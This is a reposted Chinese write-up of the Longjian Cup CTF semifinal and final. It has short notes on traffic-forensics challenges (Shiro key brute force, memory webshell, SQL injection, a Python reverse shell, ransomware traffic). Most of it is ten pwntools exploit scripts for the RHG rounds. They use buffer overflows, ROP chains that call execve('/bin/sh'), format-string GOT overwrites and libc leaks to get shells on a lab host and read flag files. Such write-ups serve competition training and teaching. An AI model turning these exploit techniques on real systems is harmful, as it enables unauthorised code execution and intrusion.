题目附件:
https://pan.baidu.com/s/1LA2Wl619oi4WlimvqPkL6Q?pwd=av3j
半决赛
数据分析
easy
1.登录的密码是多少,请输入md5加密的32位小写字符串
用户名是__test__(md5一下就行了)
2.图片中隐藏的数字是多少
提取出11.zip之后,里面有个有问题的bmp文件,bmp直接打开,修复宽高
3.被加密的字符串是多少
流量里有一个私钥和加密数据
然后用cyberchef解密
easyshiro
1.easy-shiro-1
用工具可以爆破出key
3.攻击者植入了内存webshell,使用这个webshell做了什么,其中有flag
解密数据拿到aes的key
然后解密aes数据
session
session-1
通过注入得到的username是?
每次注入最后一个字符就是准确的字符,看出来是adminadmin111
session-2
除了root用户,还有哪个用户含有root权限
看得出是test
session-3
通过debug读取的哪个文件没有找到(绝对路径)
session-4
通过什么命令反弹的shell,提交md5加密的32位小写字符串
前两条反弹shell命令都400了,只有后面这条python反弹shell命令没得问题
RHG部分
01
from pwn import *
import json
import requests
# p = process("./bin")
p = remote("172.16.7.10", 13944)
context.arch = 'amd64'
p.sendlineafter("Please shoot me", "/bin/shx00")
pop_rdi = 0x00000000004006a6
pop_rsi = 0x0000000000410023
pop_rdx = 0x000000000044b616
pop_rax = 0x00000000004005af
syscall = 0x000000000040129c
payload = b'a'*(0x20+8) + p64(pop_rdi) + p64(bss) + p64(pop_rsi) + p64(0) + p64(pop_rdx) + p64(0) + p64(pop_rax) + p64(0x3b) + p64(syscall)
p.sendlineafter(" lost. Do you admit it, yes or no?", payload)
# p.interactive()
sleep(0.1)
p.sendline("cat /home/flag4.txt")
flag = re.findall(b"flag{.+", p.recvall(timeout=1))[0].decode('utf-8')
print(flag)
02
from pwn import *
import json
import requests
# pro = process("./bin2")
pro = remote("172.16.7.10", 8960)
pause()
context.arch = 'amd64'
from struct import pack
p = lambda x : pack('I', x)
IMAGE_BASE_0 = 0x08048000 # 633a0cc474a6f90aea5ce7410cb2f9cbd158a9b917af5f3131b6e2c1672ae152
rebase_0 = lambda x : p(x + IMAGE_BASE_0)
rop = b''
rop += rebase_0(0x000008fc) # 0x080488fc: pop eax; ret;
rop += b'//bi'
rop += rebase_0(0x000008fa) # 0x080488fa: pop edx; ret;
rop += rebase_0(0x00092060)
rop += rebase_0(0x0000edc5) # 0x08056dc5: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x000008fc) # 0x080488fc: pop eax; ret;
rop += b'n/sh'
rop += rebase_0(0x000008fa) # 0x080488fa: pop edx; ret;
rop += rebase_0(0x00092064)
rop += rebase_0(0x0000edc5) # 0x08056dc5: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x000008fc) # 0x080488fc: pop eax; ret;
rop += p(0x00000000)
rop += rebase_0(0x000008fa) # 0x080488fa: pop edx; ret;
rop += rebase_0(0x00092068)
rop += rebase_0(0x0000edc5) # 0x08056dc5: mov dword ptr [edx], eax; ret;
rop += rebase_0(0x000001c9) # 0x080481c9: pop ebx; ret;
rop += rebase_0(0x00092060)
rop += rebase_0(0x00000900) # 0x08048900: pop ecx; ret;
rop += rebase_0(0x00092068)
rop += rebase_0(0x000008fa) # 0x080488fa: pop edx; ret;
rop += rebase_0(0x00092068)
rop += rebase_0(0x000008fc) # 0x080488fc: pop eax; ret;
rop += p(0x0000000b)
rop += rebase_0(0x00026a20) # 0x0806ea20: int 0x80; ret;
payload = b'a'*(0x58+4) + rop
pro.sendlineafter("Please start your challenge", payload)
pro.interactive()
03
from pwn import *
import json
import requests
# pro = process("./bin3")
# pause()
pro = remote("172.16.7.10", 12227)
payload = b'a' * (0x58 + 4)
payload += p32(0x080485BB)
payload += p32(0x0804B028)
pro.sendlineafter("portunity.", payload)
pro.interactive()
04
from pwn import *
import json
import requests
# pro = process("./bin4")
# pause()
pro = remote("172.16.7.10", 11473)
# payload = FmtStr.write()
# payload = p64(0x6009b8) + b"%6$n"
# 400660->4006f8
context.arch = 'amd64'
payload = fmtstr_payload(6, {0x6009b8:0x4006f8})
# print(payload)
# payload = b"%248c%8$naaaaaaa" + p64(0x6009b8) + p64(0x6009b9) + p64(0x6009ba) + p64(0x6009bb)
# fmtstr_payload()
# payload = fmt_str(6, 1, 0x400660, 0xf8)
# 0x007ffff7db1d90
pro.sendlineafter("Welcome to RHG! Enter your fmt >>>", payload)
pro.interactive()
05
from pwn import *
import json
import requests
# pro = process("./bin5")c
# pause()
pro = remote("172.16.7.10", 15843)
payload = b'a' * 0x28
from struct import pack
p = lambda x : pack('Q', x)
IMAGE_BASE_0 = 0x0000000000400000 # 055684d18c6ffbad428237201ebc251257542be7c438aa69d991dbbd817f352f
rebase_0 = lambda x : p(x + IMAGE_BASE_0)
rop = b''
rop += rebase_0(0x000000000000d9eb) # 0x000000000040d9eb: pop r13; ret;
rop += b'//bin/sh'
rop += rebase_0(0x00000000000006a6) # 0x00000000004006a6: pop rdi; ret;
rop += rebase_0(0x00000000002ba0e0)
rop += rebase_0(0x0000000000068729) # 0x0000000000468729: mov qword ptr [rdi], r13; pop rbx; pop rbp; pop r12; pop r13; ret;
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x000000000000d9eb) # 0x000000000040d9eb: pop r13; ret;
rop += p(0x0000000000000000)
rop += rebase_0(0x00000000000006a6) # 0x00000000004006a6: pop rdi; ret;
rop += rebase_0(0x00000000002ba0e8)
rop += rebase_0(0x0000000000068729) # 0x0000000000468729: mov qword ptr [rdi], r13; pop rbx; pop rbp; pop r12; pop r13; ret;
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x00000000000006a6) # 0x00000000004006a6: pop rdi; ret;
rop += rebase_0(0x00000000002ba0e0)
rop += rebase_0(0x00000000000105c3) # 0x00000000004105c3: pop rsi; ret;
rop += rebase_0(0x00000000002ba0e8)
rop += rebase_0(0x000000000004bb06) # 0x000000000044bb06: pop rdx; ret;
rop += rebase_0(0x00000000002ba0e8)
rop += rebase_0(0x00000000000005af) # 0x00000000004005af: pop rax; ret;
rop += p(0x000000000000003b)
rop += rebase_0(0x0000000000075355) # 0x0000000000475355: syscall; ret;
print(rop)
payload += rop
pro.sendlineafter("s elf file!", payload)
pro.interactive()
决赛
数据分析
ransom
2.找到hack用户的密码
这个流量包因为很多都是gzip压缩了看的很麻烦,所以要一个一个提取gzip的数据,然后解压缩,我注意到一个解压缩之后的文件
开头是<?cuc,这里应该是是<?php,所以是往前算了12位,p对应c,h对应u,所以hack对应的是unpx
所以我们找到了passwd,看到了unpx,提交后面这个密码不对,猜测也是换了12位,但是换了过后还是不对
3.加密了多少用户
这个一直往后跟流,我们看到很大一段base64,解密之后就是加密的文件
解密:
Win7
1.windows7虚拟机的密码多少
通过爆破得到密码为somewhere
RHG部分
01
from pwn import *
import re
from submit_flag import submit
DEBUG = False
if DEBUG:
p = process("../attachments/bin20")
context.log_level = 'debug'
pause()
else:
p = remote("172.16.7.10", 12763)
### your code
payload = b'a' * 0x58 + p64(0x00000000004007d3) + p64(0x0000000000602048) + p64(0x000000000040070B)
p.sendlineafter("You still only have one input opportunity.", payload)
### code done
if DEBUG:
p.interactive()
else:
p.sendline("cat " + "/home/flag5.txt")
flag = re.findall(b"flag{.+", p.recvall(timeout=0.5))[0].decode('utf-8')
submit(flag)
02
from pwn import *
import re
from submit_flag import submit
DEBUG = False
if DEBUG:
p = process("../attachments/bin21")
context.log_level = 'debug'
pause()
else:
p = remote("172.16.7.10", 7692)
### your code
payload = b'a' * 0x28 + p64(0x00000000004006EC)
p.sendlineafter("elf file!", payload)
### code done
if DEBUG:
p.interactive()
else:
p.sendline("cat " + "/home/flag4.txt")
flag = re.findall(b"flag{.+", p.recvall(timeout=0.5))[0].decode('utf-8')
submit(flag)
03
from pwn import *
import re
from submit_flag import submit
DEBUG = False
if DEBUG:
p = process("./bin22")
context.log_level = 'debug'
pause()
else:
p = remote("172.16.7.10", 19414)
context.log_level = 'debug'
### your code
p.sendlineafter("you want to send?", "-1")
payload = b'a' * (0x1C + 4)
payload += p32(0x80483B0)
payload += p32(0x804861b)
payload += p32(0x804b00c)
sleep(0.1)
p.sendline(payload)
p.recvuntil("succeeded.n")
libc = u32(p.recv(4)) - 0xe6e40
print(hex(libc))
p.sendlineafter("you want to send?", "-1")
payload = b'a' * (0x1C + 4)
payload += p32(libc + 0x3d2a5)
sleep(0.1)
p.sendline(payload)
p.recvuntil("succeeded.n")
### code done
if DEBUG:
p.interactive()
else:
p.sendline("cat " + "/home/flag2.txt")
flag = re.findall(b"flag{.+", p.recvall(timeout=0.5))[0].decode('utf-8')
submit(flag)
04
from pwn import *
import re
from submit_flag import submit
DEBUG = False
if DEBUG:
p = process("../attachments/bin23")
context.log_level = 'debug'
pause()
else:
p = remote("172.16.7.10", 17916)
### your code
payload = b'a' * 0x28 + p64(0x00000000004006a6) + p64(0x0000000000493328) + p64(0x00000000004105c3) + p64(0) + p64(0x000000000044bb06) + p64(0) + p64(0x00000000004005af) + p64(0x3b) + p64(0x0000000000475355)
p.sendlineafter(" this elf file!", payload)
### code done
if DEBUG:
p.interactive()
else:
p.sendline("cat " + "/home/flag3.txt")
flag = re.findall(b"flag{.+", p.recvall(timeout=0.5))[0].decode('utf-8')
submit(flag)
05
from pwn import *
import re
from submit_flag import submit
DEBUG = False
# DEBUG = True
if DEBUG:
p = process("./bin24")
context.log_level = 'debug'
pause()
else:
p = remote("172.16.7.10", 6332)
context.log_level = 'debug'
### your code
p.sendlineafter("ter your fmt >>>n", "%39$p")
libc = int(p.recv(14).replace(b"n", b"").decode("utf-8"), 16) - 0x21c87
print(hex(libc))
one = libc + 0x4f420
context.arch = 'amd64'
success(hex(one))
payload = fmtstr_payload(6, {0x601028:p64(one)})
p.sendline(payload)
# pause()
# payload = fmtstr_payload(6, {0x601020 + 4:p64(one)[4:]}, 4)
# p.sendline(payload)
### code done
if DEBUG:
p.interactive()
else:
# p.interactive()
p.sendline("cat " + "/home/flag1.txt")
flag = re.findall(b"flag{.+", p.recvall(timeout=0.5))[0].decode('utf-8')
submit(flag)
原文始发于微信公众号(BeFun安全实验室):陇剑杯半决赛&决赛部分WP
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论